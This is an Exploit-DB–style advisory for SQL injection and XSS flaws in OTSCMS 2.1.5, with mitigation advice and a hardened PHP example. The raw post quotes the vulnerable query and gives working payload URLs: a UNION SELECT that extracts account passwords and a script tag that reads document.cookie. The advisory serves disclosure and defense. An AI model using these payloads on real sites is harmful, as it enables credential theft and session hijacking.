Vendor: OTSCMS
By: GregStar (gregstar[at]c4f.pl)
CVSS: 7.5 (HIGH)
Class: Sql Injection / XSS
CWE: 89
Product Name: OTSCMS
Affected Version From: OTSCMS 2.1.5
Affected Version To: OTSCMS 2.1.5
Patch Exists: NO
Year: 2007

OTSCMS 2.1.5 SQL Injection / XSS

This advisory describes an SQL injection and a cross-site scripting (XSS) vulnerability in OTSCMS version 2.1.5. The SQL injection is in 'mod/PM/reply.php' (lines 22-26), which concatenates the 'id' parameter directly into a query string; the reply command is reached through 'priv.php', and a crafted 'id' value lets an attacker retrieve sensitive information from the database. The XSS is in 'forum.php', whose 'name' parameter is reflected into the page without encoding, so injected JavaScript executes in the browser of whoever views the page.

Mitigation:

To mitigate the SQL injection, validate the 'id' parameter (it should only ever be an integer) and pass it to the database through a prepared statement or parameterized query instead of string concatenation. To mitigate the XSS, validate input and HTML-encode the 'name' value at output time before echoing it into the page.
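The two fixes above applied to the spots the advisory names, as an added example that is not code from the advisory or from OTSCMS. It assumes a PDO connection (the advisory's own `$db` wrapper API is unknown), a constructed `pms` table with `id`, `name` and `text` columns, and hypothetical function names; an in-memory SQLite database is used so it runs stand-alone.

```php
<?php
// Added example, not OTSCMS code: hardened versions of the two vulnerable spots.
// Schema, fixture row and function names below are constructed for this example.
declare(strict_types=1);

/**
 * Replacement for the concatenated query in mod/PM/reply.php. The original appended
 * $id straight into the SQL string; here $id must validate as a positive integer and
 * is bound as a parameter, so a value such as "-1 UNION SELECT ..." is refused before
 * any SQL is built and could never be parsed as part of the statement.
 */
function readPrivateMessage(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // not a plain positive integer: refuse instead of querying
    }
    $stmt = $db->prepare('SELECT `name`, `text` FROM `pms` WHERE `id` = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * Replacement for echoing the profile `name` parameter in forum.php unencoded.
 * htmlspecialchars converts < > & " ' to entities, so a <script> tag is rendered
 * as visible text rather than executed by the browser.
 */
function renderProfileName(string $name): string
{
    return '<h1>' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h1>';
}

// Constructed fixture: one private message in an in-memory database.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE pms (id INTEGER PRIMARY KEY, name TEXT, text TEXT)');
$db->exec("INSERT INTO pms (id, name, text) VALUES (1, 'alice', 'hello')");

var_dump(readPrivateMessage($db, '1'));                       // legitimate id
var_dump(readPrivateMessage($db, '-1 UNION SELECT 1,2'));     // shape of the advisory's payload
echo renderProfileName('<script>alert(document.cookie);</script>'), PHP_EOL;
```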

Exploit-DB raw data:

***************************************************************************************************************

                                              Coding 4 Fun

***************************************************************************************************************

* Name = OTSCMS 2.1.5 by Wrzasq (http://otscms.com) ;

* Class = Sql Injection / XSS ;

* Download = http://sourceforge.net/project/showfiles.php?group_id=145557 ;

* Found by = GregStar (gregstar[at]c4f.pl) (http://c4f.pl) ;

---------------------------------------------------------------------------------------------------------------
[SQL]

Vulnerable Code in [path]/mod/PM/reply.php

line 22-26

...

extract( $http->extract('id') );

// reads message
$pm = $db->query('SELECT [pms].`name` AS `name` [...]  ' AND [pms].`id` = ' . $id)->fetchAll(); <---
$pm = $pm[0];

...

Example :

http://[target]/[path]/priv.php?command=reply&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts ;

----
[XSS]

http://[target]/[path]/forum.php?module=User&command=profile&name=<script>alert(document.cookie);</script>

# milw0rm.com [2007-02-07]